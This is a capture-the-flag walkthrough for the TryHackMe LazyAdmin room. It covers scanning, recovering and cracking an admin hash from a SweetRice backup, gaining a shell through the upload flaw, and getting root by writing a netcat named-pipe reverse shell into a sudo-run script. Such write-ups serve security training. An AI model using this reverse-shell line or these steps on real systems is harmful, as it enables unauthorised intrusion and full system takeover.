# TryHackMe LazyAdmin Room
* https://tryhackme.com/room/lazyadmin

## Web
* `nmap -sV -sC -oA . <IP>`
    * SSH on 22/tcp
    * Apache on 80/tcp with SweetRice 1.5.0
* Some recursive gobuster and manual exploration gives me :
    * Login page : `/content/as`
    * MySQL Backup : `/content/inc/mysql_backup`
    * Could also be found with `searchsploit sweetrice`
    * backup contains a user : `manager` and a password hash
    * John the ripper on the MD5 hash gives : `Password123`

## Initial Access
* Arbitrary upload vulnerability found with searchsploit
    * Upload `shell.php5` made with msfvenom
    * Catch the shell with Metasploit
* User www-data
* First flag in `/home/itguy/user.txt`

## PrivEsc
* `sudo -l`
* Gives me `/usr/bin/perl /home/itguy/backup.pl`. That script runs `/etc/copy.sh` that I can modify
* `echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.6.28.1 4545 >/tmp/f" > /etc/copy.sh`
* Listener : `nc -lvnp 4545`
* `sudo /usr/bin/perl /home/itguy/backup.pl`
* Root shell
* Flag is here : /root/root.txt
